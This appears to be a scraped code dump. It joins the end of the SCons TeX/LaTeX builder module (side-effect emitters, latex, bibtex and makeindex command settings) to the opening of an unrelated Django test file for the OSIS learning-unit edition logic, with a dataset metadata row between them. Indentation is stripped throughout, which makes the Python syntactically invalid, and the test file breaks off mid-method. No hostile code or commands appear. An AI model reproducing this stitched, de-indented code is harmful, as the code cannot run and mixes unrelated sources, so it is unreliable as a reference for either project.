if srcNode is not None:
file_tests = ScanFiles(srcNode, target, paths, file_tests, file_tests_search, env, graphics_extensions, targetdir, aux_files)
if Verbose:
print " done scanning ",str(theFile)
return file_tests
def tex_emitter_core(target, source, env, graphics_extensions):
"""An emitter for TeX and LaTeX sources.
For LaTeX sources we try and find the common created files that
are needed on subsequent runs of latex to finish tables of contents,
bibliographies, indices, lists of figures, and hyperlink references.
"""
basename = SCons.Util.splitext(str(source[0]))[0]
basefile = os.path.split(str(basename))[1]
targetdir = os.path.split(str(target[0]))[0]
targetbase = os.path.join(targetdir, basefile)
basedir = os.path.split(str(source[0]))[0]
abspath = os.path.abspath(basedir)
target[0].attributes.path = abspath
#
# file names we will make use of in searching the sources and log file
#
emit_suffixes = ['.aux', '.log', '.ilg', '.blg', '.nls', '.nlg', '.gls', '.glg', '.alg'] + all_suffixes
auxfilename = targetbase + '.aux'
logfilename = targetbase + '.log'
flsfilename = targetbase + '.fls'
syncfilename = targetbase + '.synctex.gz'
env.SideEffect(auxfilename,target[0])
env.SideEffect(logfilename,target[0])
env.SideEffect(flsfilename,target[0])
env.SideEffect(syncfilename,target[0])
if Verbose:
print "side effect :",auxfilename,logfilename,flsfilename,syncfilename
env.Clean(target[0],auxfilename)
env.Clean(target[0],logfilename)
env.Clean(target[0],flsfilename)
env.Clean(target[0],syncfilename)
content = source[0].get_text_contents()
# These variables are no longer used.
#idx_exists = os.path.isfile(targetbase + '.idx')
#nlo_exists = os.path.isfile(targetbase + '.nlo')
#glo_exists = os.path.isfile(targetbase + '.glo')
#acr_exists = os.path.isfile(targetbase + '.acn')
# set up list with the regular expressions
# we use to find features used
file_tests_search = [auxfile_re,
makeindex_re,
bibliography_re,
bibunit_re,
multibib_re,
addbibresource_re,
tableofcontents_re,
listoffigures_re,
listoftables_re,
hyperref_re,
makenomenclature_re,
makeglossary_re,
makeglossaries_re,
makeacronyms_re,
beamer_re,
newglossary_re,
biblatex_re ]
# set up list with the file suffixes that need emitting
# when a feature is found
file_tests_suff = [['.aux','aux_file'],
['.idx', '.ind', '.ilg','makeindex'],
['.bbl', '.blg','bibliography'],
['.bbl', '.blg','bibunit'],
['.bbl', '.blg','multibib'],
['.bbl', '.blg','.bcf','addbibresource'],
['.toc','contents'],
['.lof','figures'],
['.lot','tables'],
['.out','hyperref'],
['.nlo', '.nls', '.nlg','nomenclature'],
['.glo', '.gls', '.glg','glossary'],
['.glo', '.gls', '.glg','glossaries'],
['.acn', '.acr', '.alg','acronyms'],
['.nav', '.snm', '.out', '.toc','beamer'],
['newglossary',],
['.bcf', '.blg','biblatex'] ]
# for newglossary the suffixes are added as we find the command
# build the list of lists
file_tests = []
for i in range(len(file_tests_search)):
file_tests.append( [None, file_tests_suff[i]] )
# TO-DO: need to add a way for the user to extend this list for whatever
# auxiliary files they create in other (or their own) packages
# get path list from both env['TEXINPUTS'] and env['ENV']['TEXINPUTS']
savedpath = modify_env_var(env, 'TEXINPUTS', abspath)
paths = env['ENV']['TEXINPUTS']
if SCons.Util.is_List(paths):
pass
else:
# Split at os.pathsep to convert into absolute path
paths = paths.split(os.pathsep)
# now that we have the path list restore the env
if savedpath is _null:
try:
del env['ENV']['TEXINPUTS']
except KeyError:
pass # was never set
else:
env['ENV']['TEXINPUTS'] = savedpath
if Verbose:
print "search path ",paths
# scan all sources for side effect files
aux_files = []
file_tests = ScanFiles(source[0], target, paths, file_tests, file_tests_search, env, graphics_extensions, targetdir, aux_files)
for (theSearch,suffix_list) in file_tests:
# add side effects if feature is present.If file is to be generated,add all side effects
if Verbose and theSearch:
print "check side effects for ",suffix_list[-1]
if (theSearch != None) or (not source[0].exists() ):
file_list = [targetbase,]
# for bibunit we need a list of files
if suffix_list[-1] == 'bibunit':
file_basename = os.path.join(targetdir, 'bu*.aux')
file_list = glob.glob(file_basename)
# remove the suffix '.aux'
for i in range(len(file_list)):
file_list.append(SCons.Util.splitext(file_list[i])[0])
# for multibib we need a list of files
if suffix_list[-1] == 'multibib':
for multibibmatch in multibib_re.finditer(content):
if Verbose:
print "multibib match ",multibibmatch.group(1)
if multibibmatch != None:
baselist = multibibmatch.group(1).split(',')
if Verbose:
print "multibib list ", baselist
for i in range(len(baselist)):
file_list.append(os.path.join(targetdir, baselist[i]))
# now define the side effects
for file_name in file_list:
for suffix in suffix_list[:-1]:
env.SideEffect(file_name + suffix,target[0])
if Verbose:
print "side effect tst :",file_name + suffix, " target is ",str(target[0])
env.Clean(target[0],file_name + suffix)
for aFile in aux_files:
aFile_base = SCons.Util.splitext(aFile)[0]
env.SideEffect(aFile_base + '.aux',target[0])
if Verbose:
print "side effect aux :",aFile_base + '.aux'
env.Clean(target[0],aFile_base + '.aux')
# read fls file to get all other files that latex creates and will read on the next pass
# remove files from list that we explicitly dealt with above
if os.path.isfile(flsfilename):
content = open(flsfilename, "rb").read()
out_files = openout_re.findall(content)
myfiles = [auxfilename, logfilename, flsfilename, targetbase+'.dvi',targetbase+'.pdf']
for filename in out_files[:]:
if filename in myfiles:
out_files.remove(filename)
env.SideEffect(out_files,target[0])
if Verbose:
print "side effect fls :",out_files
env.Clean(target[0],out_files)
return (target, source)
TeXLaTeXAction = None
def generate(env):
"""Add Builders and construction variables for TeX to an Environment."""
global TeXLaTeXAction
if TeXLaTeXAction is None:
TeXLaTeXAction = SCons.Action.Action(TeXLaTeXFunction,
strfunction=TeXLaTeXStrFunction)
env.AppendUnique(LATEXSUFFIXES=SCons.Tool.LaTeXSuffixes)
generate_common(env)
import dvi
dvi.generate(env)
bld = env['BUILDERS']['DVI']
bld.add_action('.tex', TeXLaTeXAction)
bld.add_emitter('.tex', tex_eps_emitter)
def generate_darwin(env):
try:
environ = env['ENV']
except KeyError:
environ = {}
env['ENV'] = environ
if (platform.system() == 'Darwin'):
try:
ospath = env['ENV']['PATHOSX']
except:
ospath = None
if ospath:
env.AppendENVPath('PATH', ospath)
def generate_common(env):
"""Add internal Builders and construction variables for LaTeX to an Environment."""
# Add OSX system paths so TeX tools can be found
# when a list of tools is given the exists() method is not called
generate_darwin(env)
# A generic tex file Action, sufficient for all tex files.
global TeXAction
if TeXAction is None:
TeXAction = SCons.Action.Action("$TEXCOM", "$TEXCOMSTR")
# An Action to build a latex file. This might be needed more
# than once if we are dealing with labels and bibtex.
global LaTeXAction
if LaTeXAction is None:
LaTeXAction = SCons.Action.Action("$LATEXCOM", "$LATEXCOMSTR")
# Define an action to run BibTeX on a file.
global BibTeXAction
if BibTeXAction is None:
BibTeXAction = SCons.Action.Action("$BIBTEXCOM", "$BIBTEXCOMSTR")
# Define an action to run Biber on a file.
global BiberAction
if BiberAction is None:
BiberAction = SCons.Action.Action("$BIBERCOM", "$BIBERCOMSTR")
# Define an action to run MakeIndex on a file.
global MakeIndexAction
if MakeIndexAction is None:
MakeIndexAction = SCons.Action.Action("$MAKEINDEXCOM", "$MAKEINDEXCOMSTR")
# Define an action to run MakeIndex on a file for nomenclatures.
global MakeNclAction
if MakeNclAction is None:
MakeNclAction = SCons.Action.Action("$MAKENCLCOM", "$MAKENCLCOMSTR")
# Define an action to run MakeIndex on a file for glossaries.
global MakeGlossaryAction
if MakeGlossaryAction is None:
MakeGlossaryAction = SCons.Action.Action("$MAKEGLOSSARYCOM", "$MAKEGLOSSARYCOMSTR")
# Define an action to run MakeIndex on a file for acronyms.
global MakeAcronymsAction
if MakeAcronymsAction is None:
MakeAcronymsAction = SCons.Action.Action("$MAKEACRONYMSCOM", "$MAKEACRONYMSCOMSTR")
try:
environ = env['ENV']
except KeyError:
environ = {}
env['ENV'] = environ
# Some Linux platforms have pdflatex set up in a way
# that requires that the HOME environment variable be set.
# Add it here if defined.
v = os.environ.get('HOME')
if v:
environ['HOME'] = v
CDCOM = 'cd '
if platform.system() == 'Windows':
# allow cd command to change drives on Windows
CDCOM = 'cd /D '
env['TEX'] = 'tex'
env['TEXFLAGS'] = SCons.Util.CLVar('-interaction=nonstopmode -recorder')
env['TEXCOM'] = CDCOM + '${TARGET.dir} && $TEX $TEXFLAGS ${SOURCE.file}'
env['PDFTEX'] = 'pdftex'
env['PDFTEXFLAGS'] = SCons.Util.CLVar('-interaction=nonstopmode -recorder')
env['PDFTEXCOM'] = CDCOM + '${TARGET.dir} && $PDFTEX $PDFTEXFLAGS ${SOURCE.file}'
env['LATEX'] = 'latex'
env['LATEXFLAGS'] = SCons.Util.CLVar('-interaction=nonstopmode -recorder')
env['LATEXCOM'] = CDCOM + '${TARGET.dir} && $LATEX $LATEXFLAGS ${SOURCE.file}'
env['LATEXRETRIES'] = 4
env['PDFLATEX'] = 'pdflatex'
env['PDFLATEXFLAGS'] = SCons.Util.CLVar('-interaction=nonstopmode -recorder')
env['PDFLATEXCOM'] = CDCOM + '${TARGET.dir} && $PDFLATEX $PDFLATEXFLAGS ${SOURCE.file}'
env['BIBTEX'] = 'bibtex'
env['BIBTEXFLAGS'] = SCons.Util.CLVar('')
env['BIBTEXCOM'] = CDCOM + '${TARGET.dir} && $BIBTEX $BIBTEXFLAGS ${SOURCE.filebase}'
env['BIBER'] = 'biber'
env['BIBERFLAGS'] = SCons.Util.CLVar('')
env['BIBERCOM'] = CDCOM + '${TARGET.dir} && $BIBER $BIBERFLAGS ${SOURCE.filebase}'
env['MAKEINDEX'] = 'makeindex'
env['MAKEINDEXFLAGS'] = SCons.Util.CLVar('')
env['MAKEINDEXCOM'] = CDCOM + '${TARGET.dir} && $MAKEINDEX $MAKEINDEXFLAGS ${SOURCE.file}'
env['MAKEGLOSSARY'] = 'makeindex'
env['MAKEGLOSSARYSTYLE'] = '${SOURCE.filebase}.ist'
env['MAKEGLOSSARYFLAGS'] = SCons.Util.CLVar('-s ${MAKEGLOSSARYSTYLE} -t ${SOURCE.filebase}.glg')
env['MAKEGLOSSARYCOM'] = CDCOM + '${TARGET.dir} && $MAKEGLOSSARY ${SOURCE.filebase}.glo $MAKEGLOSSARYFLAGS -o ${SOURCE.filebase}.gls'
env['MAKEACRONYMS'] = 'makeindex'
env['MAKEACRONYMSSTYLE'] = '${SOURCE.filebase}.ist'
env['MAKEACRONYMSFLAGS'] = SCons.Util.CLVar('-s ${MAKEACRONYMSSTYLE} -t ${SOURCE.filebase}.alg')
env['MAKEACRONYMSCOM'] = CDCOM + '${TARGET.dir} && $MAKEACRONYMS ${SOURCE.filebase}.acn $MAKEACRONYMSFLAGS -o ${SOURCE.filebase}.acr'
env['MAKENCL'] = 'makeindex'
env['MAKENCLSTYLE'] = 'nomencl.ist'
env['MAKENCLFLAGS'] = '-s ${MAKENCLSTYLE} -t ${SOURCE.filebase}.nlg'
env['MAKENCLCOM'] = CDCOM + '${TARGET.dir} && $MAKENCL ${SOURCE.filebase}.nlo $MAKENCLFLAGS -o ${SOURCE.filebase}.nls'
env['MAKENEWGLOSSARY'] = 'makeindex'
env['MAKENEWGLOSSARYCOM'] = CDCOM + '${TARGET.dir} && $MAKENEWGLOSSARY '
def exists(env):
generate_darwin(env)
return env.Detect('tex')
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| mit | -993,091,141,330,779,500 | 39.50504 | 282 | 0.608546 | false |
uclouvain/OSIS-Louvain | base/tests/business/test_learning_unit_edition.py | 1 | 63175 | ##############################################################################
#
# OSIS stands for Open Student Information System. It's an application
# designed to manage the core business of higher education institutions,
# such as universities, faculties, institutes and professional schools.
# The core business involves the administration of students, teachers,
# courses, programs and so on.
#
# Copyright (C) 2015-2019 Université catholique de Louvain (http://www.uclouvain.be)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# A copy of this license - GNU General Public License - is available
# at the root of the source code of this program. If not,
# see http://www.gnu.org/licenses/.
#
##############################################################################
from datetime import datetime
from decimal import Decimal
from django.db import IntegrityError
from django.forms import model_to_dict
from django.test import TestCase
from django.utils.translation import gettext_lazy as _
from base.business.learning_units.edition import edit_learning_unit_end_date, update_learning_unit_year_with_report, \
_report_volume
from base.forms.utils.choice_field import NO_PLANNED_END_DISPLAY
from base.models import academic_year
from base.models import learning_unit_year as mdl_luy
from base.models import teaching_material as mdl_teaching_material
from base.models.academic_year import compute_max_academic_year_adjournment
from base.models.enums import learning_component_year_type
from base.models.enums import learning_unit_year_subtypes, learning_unit_year_periodicity, \
learning_container_year_types, attribution_procedure, internship_subtypes, learning_unit_year_session, \
quadrimesters, vacant_declaration_type, entity_container_year_link_type
from base.models.enums.entity_container_year_link_type import REQUIREMENT_ENTITY, ALLOCATION_ENTITY, \
ADDITIONAL_REQUIREMENT_ENTITY_1, ADDITIONAL_REQUIREMENT_ENTITY_2
from base.models.learning_component_year import LearningComponentYear
from base.models.learning_container_year import LearningContainerYear
from base.models.learning_unit_year import LearningUnitYear
from base.tests.factories.academic_year import AcademicYearFactory
from base.tests.factories.business.learning_units import LearningUnitsMixin, GenerateContainer
from base.tests.factories.campus import CampusFactory
from base.tests.factories.entity import EntityFactory
from base.tests.factories.entity_version import EntityVersionFactory
from base.tests.factories.external_learning_unit_year import ExternalLearningUnitYearFactory
from base.tests.factories.learning_component_year import LearningComponentYearFactory, \
LecturingLearningComponentYearFactory, PracticalLearningComponentYearFactory
from base.tests.factories.learning_container_year import LearningContainerYearFactory
from base.tests.factories.learning_unit import LearningUnitFactory
from base.tests.factories.learning_unit_year import LearningUnitYearFactory
from cms.models.translated_text import TranslatedText
from learning_unit.models.learning_class_year import LearningClassYear
from learning_unit.tests.factories.learning_class_year import LearningClassYearFactory
from reference.tests.factories.language import LanguageFactory
class TestLearningUnitEdition(TestCase, LearningUnitsMixin):
"""
General cases :
The start date of the learning unit is greater than current academic year
Only test the ANNUAL periodicity (the BIENNAL periodicity is covered later on)
The new end date of the learning unit is greater than old end date (creation)
01. test_edit_learning_unit_full_annual_end_date_gt_old_end_date_with_start_date_gt_now
02. test_edit_learning_unit_partim_annual_end_date_gt_old_end_date_with_start_date_gt_now
The start date of the learning unit is less than current academic year
The new end date of the learning unit is greater than old end date (creation)
03. test_edit_learning_unit_full_annual_end_date_gt_old_end_date_with_start_date_lt_now
04. test_edit_learning_unit_full_odd_end_date_gt_old_end_date_with_start_date_lt_now
05. test_edit_learning_unit_full_even_end_date_gt_old_end_date_with_start_date_lt_now
06. test_edit_learning_unit_partim_annual_end_gt_old_end_date_date_with_start_date_lt_now
The new end date of the learning unit is none (creation)
07. test_edit_learning_unit_full_annual_end_date_is_none_with_start_date_lt_now
08. test_edit_learning_unit_partim_annual_end_date_is_none_with_start_date_lt_now
09. test_edit_learning_unit_partim_annual_end_date_is_none_with_start_date_lt_now_with_error
The new end date of the learning unit is less than old end date (deletion)
10. test_edit_learning_unit_full_annual_end_date_lt_old_end_date_with_start_date_lt_now
11. test_edit_learning_unit_full_odd_end_date_lt_old_end_date_with_start_date_lt_now
12. test_edit_learning_unit_full_even_end_date_lt_old_end_date_with_start_date_lt_now
13. test_edit_learning_unit_partim_annual_end_date_lt_old_end_date_with_start_date_lt_now
"""
@classmethod
def setUpTestData(cls):
super().setUpTestData()
cls.setup_academic_years()
cls.learning_container_year_course = cls.setup_learning_container_year(
academic_year=cls.starting_academic_year,
container_type=learning_container_year_types.COURSE
)
cls.number_classes = 5
cls.entity_version = EntityVersionFactory(start_date=datetime.now(), end_date=datetime(3000, 1, 1))
cls.entity = cls.entity_version.entity
def test_edit_learning_unit_full_annual_end_date_gt_old_end_date_with_start_date_gt_now(self):
start_year = AcademicYearFactory(year=self.starting_academic_year.year + 1)
end_year = AcademicYearFactory(year=self.starting_academic_year.year + 3)
expected_end_year = AcademicYearFactory(year=end_year.year + 3)
list_of_expected_learning_unit_years = list(range(start_year.year, expected_end_year.year + 1))
learning_unit_full_annual = self.setup_learning_unit(
start_year=start_year,
end_year=end_year,
)
self.setup_list_of_learning_unit_years_full(
list_of_academic_years=self.list_of_academic_years_after_now,
learning_unit_full=learning_unit_full_annual,
periodicity=learning_unit_year_periodicity.ANNUAL
)
academic_year_of_new_end_date = academic_year.find_academic_year_by_year(expected_end_year.year)
edit_learning_unit_end_date(learning_unit_full_annual, academic_year_of_new_end_date)
list_of_learning_unit_years = _get_list_years_learning_unit(learning_unit_full_annual)
self.assertEqual(list_of_learning_unit_years, list_of_expected_learning_unit_years)
def test_edit_learning_unit_partim_annual_end_date_gt_old_end_date_with_start_date_gt_now(self):
start_year_full = AcademicYearFactory(year=self.starting_academic_year.year + 1)
end_year_full = AcademicYearFactory(year=self.starting_academic_year.year + 6)
start_year_partim = AcademicYearFactory(year=self.starting_academic_year.year + 2)
end_year_partim = AcademicYearFactory(year=self.starting_academic_year.year + 3)
excepted_end_year_partim = AcademicYearFactory(year=end_year_partim.year + 2)
learning_unit_full_annual = self.setup_learning_unit(start_year=start_year_full, end_year=end_year_full)
learning_unit_partim_annual = self.setup_learning_unit(start_year=start_year_partim, end_year=end_year_partim)
self.setup_list_of_learning_unit_years_partim(
list_of_academic_years=self.list_of_academic_years_after_now,
learning_unit_full=learning_unit_full_annual,
learning_unit_partim=learning_unit_partim_annual
)
list_of_expected_learning_unit_years_full = list(range(start_year_full.year, end_year_full.year + 1))
list_of_expected_learning_unit_years_partim = list(
range(start_year_partim.year, excepted_end_year_partim.year + 1)
)
academic_year_of_new_end_date = academic_year.find_academic_year_by_year(excepted_end_year_partim.year)
edit_learning_unit_end_date(learning_unit_partim_annual, academic_year_of_new_end_date)
list_of_learning_unit_years_full = _get_list_years_learning_unit(learning_unit_full_annual)
list_of_learning_unit_years_partim = _get_list_years_learning_unit(learning_unit_partim_annual)
self.assertEqual(len(list_of_learning_unit_years_full), len(list_of_expected_learning_unit_years_full))
self.assertEqual(list_of_learning_unit_years_partim, list_of_expected_learning_unit_years_partim)
def test_edit_learning_unit_full_annual_end_date_gt_old_end_date_with_start_date_lt_now(self):
start_year_full = AcademicYearFactory(year=self.starting_academic_year.year - 1)
end_year_full = AcademicYearFactory(year=self.starting_academic_year.year + 1)
expected_end_year_full = AcademicYearFactory(year=end_year_full.year + 2)
learning_unit_full_annual = self.setup_learning_unit(start_year=start_year_full, end_year=end_year_full)
self.setup_list_of_learning_unit_years_full(
list_of_academic_years=self.list_of_academic_years,
learning_unit_full=learning_unit_full_annual,
periodicity=learning_unit_year_periodicity.ANNUAL
)
list_of_expected_learning_unit_years = list(range(start_year_full.year, expected_end_year_full.year + 1))
academic_year_of_new_end_date = academic_year.find_academic_year_by_year(expected_end_year_full.year)
edit_learning_unit_end_date(learning_unit_full_annual, academic_year_of_new_end_date)
list_of_learning_unit_years = _get_list_years_learning_unit(learning_unit_full_annual)
self.assertEqual(list_of_learning_unit_years, list_of_expected_learning_unit_years)
def test_edit_learning_unit_partim_annual_end_gt_old_end_date_date_with_start_date_lt_now(self):
start_year = AcademicYearFactory(year=self.starting_academic_year.year - 1)
end_year = AcademicYearFactory(year=self.starting_academic_year.year + 3)
end_year_partim = AcademicYearFactory(year=self.starting_academic_year.year + 1)
excepted_end_year_partim = AcademicYearFactory(year=end_year_partim.year + 2)
learning_unit_full_annual = self.setup_learning_unit(start_year=start_year, end_year=end_year)
learning_unit_partim_annual = self.setup_learning_unit(start_year=start_year, end_year=end_year_partim)
list_of_learning_unit_years_annual = self.setup_list_of_learning_unit_years_partim(
list_of_academic_years=self.list_of_academic_years_after_now,
learning_unit_full=learning_unit_full_annual,
learning_unit_partim=learning_unit_partim_annual
)
list_of_expected_learning_unit_years_full = []
list_of_expected_learning_unit_years_partim = []
for learning_unit_year_expected in list_of_learning_unit_years_annual:
if learning_unit_year_expected.is_partim():
list_of_expected_learning_unit_years_partim.append(learning_unit_year_expected.academic_year.year)
else:
list_of_expected_learning_unit_years_full.append(learning_unit_year_expected.academic_year.year)
list_of_expected_learning_unit_years_partim.append(learning_unit_partim_annual.end_year.year + 1)
list_of_expected_learning_unit_years_partim.append(learning_unit_partim_annual.end_year.year + 2)
academic_year_of_new_end_date = academic_year.find_academic_year_by_year(excepted_end_year_partim.year)
edit_learning_unit_end_date(learning_unit_partim_annual, academic_year_of_new_end_date)
list_of_learning_unit_years_full = _get_list_years_learning_unit(learning_unit_full_annual)
list_of_learning_unit_years_partim = _get_list_years_learning_unit(learning_unit_partim_annual)
self.assertEqual(list_of_learning_unit_years_full, list_of_expected_learning_unit_years_full)
self.assertEqual(list_of_learning_unit_years_partim, list_of_expected_learning_unit_years_partim)
def test_edit_learning_unit_full_annual_end_date_is_none_with_start_date_lt_now(self):
start_year = AcademicYearFactory(year=self.starting_academic_year.year - 1)
end_year = AcademicYearFactory(year=self.starting_academic_year.year + 4)
expected_end_year = AcademicYearFactory(year=end_year.year + 2)
learning_unit_full_annual = self.setup_learning_unit(start_year=start_year, end_year=end_year)
self.setup_list_of_learning_unit_years_full(
list_of_academic_years=self.list_of_academic_years,
learning_unit_full=learning_unit_full_annual,
periodicity=learning_unit_year_periodicity.ANNUAL
)
list_of_expected_learning_unit_years = list(range(start_year.year, expected_end_year.year + 1))
academic_year_of_new_end_date = None
edit_learning_unit_end_date(learning_unit_full_annual, academic_year_of_new_end_date)
list_of_learning_unit_years = _get_list_years_learning_unit(learning_unit_full_annual)
self.assertEqual(list_of_learning_unit_years, list_of_expected_learning_unit_years)
def test_edit_learning_unit_partim_annual_end_date_is_none_with_start_date_lt_now(self):
start_year = AcademicYearFactory(year=self.starting_academic_year.year - 1)
end_year = AcademicYearFactory(year=self.starting_academic_year.year + 6)
partim_end_year = AcademicYearFactory(year=self.starting_academic_year.year + 4)
learning_unit_full_annual = self.setup_learning_unit(start_year=start_year, end_year=end_year)
learning_unit_partim_annual = self.setup_learning_unit(start_year=start_year, end_year=partim_end_year)
self.setup_list_of_learning_unit_years_partim(
list_of_academic_years=self.list_of_academic_years_after_now,
learning_unit_full=learning_unit_full_annual,
learning_unit_partim=learning_unit_partim_annual
)
with self.assertRaises(IntegrityError):
edit_learning_unit_end_date(learning_unit_partim_annual, None)
def test_edit_learning_unit_partim_annual_end_date_is_none_with_start_date_lt_now_with_error(self):
start_year = AcademicYearFactory(year=self.starting_academic_year.year - 1)
end_year = AcademicYearFactory(year=self.starting_academic_year.year + 4)
partim_end_year = AcademicYearFactory(year=self.starting_academic_year.year + 2)
learning_unit_full_annual = self.setup_learning_unit(start_year=start_year, end_year=end_year)
learning_unit_partim_annual = self.setup_learning_unit(start_year=start_year, end_year=partim_end_year)
self.setup_list_of_learning_unit_years_partim(
list_of_academic_years=self.list_of_academic_years_after_now,
learning_unit_full=learning_unit_full_annual,
learning_unit_partim=learning_unit_partim_annual
)
academic_year_of_new_end_date = None
with self.assertRaises(IntegrityError):
edit_learning_unit_end_date(learning_unit_partim_annual, academic_year_of_new_end_date)
def test_edit_learning_unit_full_annual_end_date_lt_old_end_date_with_start_date_lt_now(self):
start_year = AcademicYearFactory(year=self.starting_academic_year.year - 1)
end_year = AcademicYearFactory(year=self.starting_academic_year.year + 6)
learning_unit_full_annual = self.setup_learning_unit(start_year=start_year, end_year=end_year)
self.setup_list_of_learning_unit_years_full(
list_of_academic_years=self.list_of_academic_years,
learning_unit_full=learning_unit_full_annual,
periodicity=learning_unit_year_periodicity.ANNUAL
)
list_of_expected_learning_unit_years = []
for learning_unit_year in list(LearningUnitYear.objects.all()):
list_of_expected_learning_unit_years.append(learning_unit_year.academic_year.year)
list_of_expected_learning_unit_years = sorted(list_of_expected_learning_unit_years)
list_of_expected_learning_unit_years.pop()
academic_year_of_new_end_date = academic_year.find_academic_year_by_year(
learning_unit_full_annual.end_year.year - 1
)
edit_learning_unit_end_date(learning_unit_full_annual, academic_year_of_new_end_date)
list_of_learning_unit_years = _get_list_years_learning_unit(learning_unit_full_annual)
self.assertEqual(sorted(list_of_learning_unit_years), list_of_expected_learning_unit_years)
def test_edit_learning_unit_full_odd_end_date_lt_old_end_date_with_start_date_lt_now(self):
start_year = AcademicYearFactory(year=self.starting_academic_year.year - 1)
end_year = AcademicYearFactory(year=self.starting_academic_year.year + 6)
learning_unit_full_annual = self.setup_learning_unit(start_year=start_year, end_year=end_year)
self.setup_list_of_learning_unit_years_full(
list_of_academic_years=self.list_of_academic_years,
learning_unit_full=learning_unit_full_annual,
periodicity=learning_unit_year_periodicity.BIENNIAL_ODD
)
list_of_expected_learning_unit_years = []
for learning_unit_year in list(LearningUnitYear.objects.all()):
list_of_expected_learning_unit_years.append(learning_unit_year.academic_year.year)
list_of_expected_learning_unit_years = sorted(list_of_expected_learning_unit_years)
year_to_remove = list_of_expected_learning_unit_years.pop()
academic_year_of_new_end_date = academic_year.find_academic_year_by_year(
year_to_remove - 1
)
edit_learning_unit_end_date(learning_unit_full_annual, academic_year_of_new_end_date)
list_of_learning_unit_years = _get_list_years_learning_unit(learning_unit_full_annual)
self.assertEqual(sorted(list_of_learning_unit_years), list_of_expected_learning_unit_years)
def test_edit_learning_unit_full_even_end_date_lt_old_end_date_with_start_date_lt_now(self):
start_year = AcademicYearFactory(year=self.starting_academic_year.year - 1)
end_year = AcademicYearFactory(year=self.starting_academic_year.year + 6)
learning_unit_full_annual = self.setup_learning_unit(start_year=start_year, end_year=end_year)
self.setup_list_of_learning_unit_years_full(
list_of_academic_years=self.list_of_academic_years,
learning_unit_full=learning_unit_full_annual,
periodicity=learning_unit_year_periodicity.BIENNIAL_EVEN
)
list_of_expected_learning_unit_years = []
for learning_unit_year in list(LearningUnitYear.objects.all()):
list_of_expected_learning_unit_years.append(learning_unit_year.academic_year.year)
list_of_expected_learning_unit_years = sorted(list_of_expected_learning_unit_years)
year_to_remove = list_of_expected_learning_unit_years.pop()
academic_year_of_new_end_date = academic_year.find_academic_year_by_year(
year_to_remove - 1
)
edit_learning_unit_end_date(learning_unit_full_annual, academic_year_of_new_end_date)
list_of_learning_unit_years = _get_list_years_learning_unit(learning_unit_full_annual)
self.assertEqual(sorted(list_of_learning_unit_years), list_of_expected_learning_unit_years)
def test_edit_learning_unit_partim_annual_end_date_lt_old_end_date_with_start_date_lt_now(self):
start_year = AcademicYearFactory(year=self.starting_academic_year.year - 1)
end_year = AcademicYearFactory(year=self.starting_academic_year.year + 6)
learning_unit_full_annual = self.setup_learning_unit(start_year=start_year, end_year=end_year)
learning_unit_partim_annual = self.setup_learning_unit(start_year=start_year, end_year=end_year)
list_of_learning_unit_years_annual = self.setup_list_of_learning_unit_years_partim(
list_of_academic_years=self.list_of_academic_years_after_now,
learning_unit_full=learning_unit_full_annual,
learning_unit_partim=learning_unit_partim_annual
)
list_of_expected_learning_unit_years_full = []
list_of_expected_learning_unit_years_partim = []
for learning_unit_year_expected in list_of_learning_unit_years_annual:
if learning_unit_year_expected.is_partim():
list_of_expected_learning_unit_years_partim.append(learning_unit_year_expected.academic_year.year)
else:
list_of_expected_learning_unit_years_full.append(learning_unit_year_expected.academic_year.year)
list_of_expected_learning_unit_years_partim = sorted(list_of_expected_learning_unit_years_partim)
year_to_remove = list_of_expected_learning_unit_years_partim.pop()
academic_year_of_new_end_date = academic_year.find_academic_year_by_year(
year_to_remove - 1
)
edit_learning_unit_end_date(learning_unit_partim_annual, academic_year_of_new_end_date)
list_of_learning_unit_years_full = _get_list_years_learning_unit(learning_unit_full_annual)
list_of_learning_unit_years_partim = _get_list_years_learning_unit(learning_unit_partim_annual)
self.assertEqual(len(list_of_learning_unit_years_full), len(list_of_expected_learning_unit_years_full))
self.assertEqual(sorted(list_of_learning_unit_years_partim), list_of_expected_learning_unit_years_partim)
def test_edit_learning_unit_full_annual_end_date_with_wrong_partim_end_year(self):
start_year = AcademicYearFactory(year=self.starting_academic_year.year - 1)
end_year = AcademicYearFactory(year=self.starting_academic_year.year + 6)
learning_unit_full_annual = self.setup_learning_unit(start_year=start_year, end_year=end_year)
learning_unit_partim_annual = self.setup_learning_unit(start_year=start_year, end_year=end_year)
list_partims = self.setup_list_of_learning_unit_years_partim(
list_of_academic_years=self.list_of_academic_years_after_now,
learning_unit_full=learning_unit_full_annual,
learning_unit_partim=learning_unit_partim_annual
)
learning_unit_full_annual.learning_container = list_partims[0].learning_container_year.learning_container
learning_unit_full_annual.save()
learning_unit_partim_annual.learning_container = list_partims[0].learning_container_year.learning_container
learning_unit_partim_annual.save()
academic_year_of_new_end_date = academic_year.find_academic_year_by_year(end_year.year - 3)
with self.assertRaises(IntegrityError) as context:
edit_learning_unit_end_date(learning_unit_full_annual, academic_year_of_new_end_date)
self.assertEqual(str(context.exception),
_('The learning unit %(learning_unit)s has a partim %(partim)s with'
' an end year greater than %(year)s') % {
'learning_unit': learning_unit_full_annual.acronym,
'partim': list_partims[1].acronym,
'year': academic_year_of_new_end_date}
)
def test_edit_learning_unit_full_annual_end_date_with_wrong_partim_end_year_and_no_luy(self):
start_year = AcademicYearFactory(year=self.starting_academic_year.year - 1)
end_year = AcademicYearFactory(year=self.starting_academic_year.year + 6)
learning_unit_full_annual = self.setup_learning_unit(start_year=start_year, end_year=end_year)
learning_unit_partim_annual = self.setup_learning_unit(start_year=start_year, end_year=end_year)
list_partims = self.setup_list_of_learning_unit_years_partim(
list_of_academic_years=self.list_of_academic_years_after_now[:2],
learning_unit_full=learning_unit_full_annual,
learning_unit_partim=learning_unit_partim_annual
)
learning_unit_full_annual.learning_container = list_partims[0].learning_container_year.learning_container
learning_unit_full_annual.save()
learning_unit_partim_annual.learning_container = list_partims[0].learning_container_year.learning_container
learning_unit_partim_annual.save()
academic_year_of_new_end_date = academic_year.find_academic_year_by_year(end_year.year - 3)
with self.assertRaises(IntegrityError) as context:
